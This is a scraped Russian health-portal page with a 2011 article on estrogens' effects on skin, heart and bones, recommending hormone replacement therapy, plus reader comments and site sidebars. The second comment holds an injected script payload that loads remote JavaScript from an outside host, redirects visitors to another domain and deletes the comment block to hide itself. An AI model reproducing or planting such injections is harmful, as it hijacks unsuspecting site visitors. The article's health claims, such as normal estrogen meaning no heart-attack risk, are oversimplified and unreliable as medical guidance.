Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Женское счастье: половые ...  >>  Женское счастье: половые гормоны эстрогены
 
Обратная связь
 

Женское счастье: половые гормоны эстрогены

Размер шрифта
30 ноября 2011 06:59
  • google_analytics: false
  • Нравится

После 50 лет уровень эстрогенов резко падает. Чем это опасно и как восстановить нормальный уровень эстрогенов? 

Эстроген

  1. Эстрогены – гормоны красоты

Эстрогены удерживают влагу в коже. Благодаря нормальному уровню эстрогенов в молодости у девушки кожа гладкая, хорошо увлаженная. Все слизистые так же хорошо увлажнены.

  1. Эстрогены – гормоны здорового сердца и сосудов

Женские половые гормоны оказывают антиатеросклеротическое действие, увеличивают уровень «хорошего» холестерина в организме и уменьшают уровень «плохого». В итоге жиры не встраиваются в сосудистую стенку. В сосудах не формируются бляшки, а значит, женщине не грозит инфаркт.

Мужчины, в организме которых эстрогены присутствуют в гораздо меньшем количестве, умирают от инфаркта и инсульта в пять раз чаще женщин.

  1. Эстрогены – гормоны крепких костей

Именно женские половые гормоны позволяют женщинам в буквальном смысле слова «крепко стоять на ногах». Эстрогены стимулируют образование остеобластов – клеток-«строителей» молодой костной ткани.

Если уровень эстрогенов падает, растет количество остеокластов – клеток-разрушителей, размывающих костную ткань. Вот почему в период постменопаузы у женщин развивается остеопороз. Кости становятся хрупкими, рыхлыми, легко ломаются при нагрузках. Переломы шейки бедра, лучевых костей, увы, типичны для женщин старшего возраста.

Что делать, если уровень гормонов снижается?

С нехваткой эстрогенов можно и нужно бороться. Поможет в этом гормонозаместительная терапия.

Видеосюжеты по теме: 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

16 сентября 2013 в 17:29

Комментарий удален за нарушение Правил общения

2 - zzzzzz

01 июля 2015 в 00:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Неожиданные ингредиенты обеда   Новое средство в борьбе с приливами   Не спите по ночам? У вас в 2 раза больше шансов получить рак груди!   Диагностика при гормональных нарушениях  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
9 причин занятся сексом прямо сейчас
7 причин заниматься сексом больше
Самые неожиданные причины молочницы

Тесты

1
Есть ли у вас гормональные нарушения
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.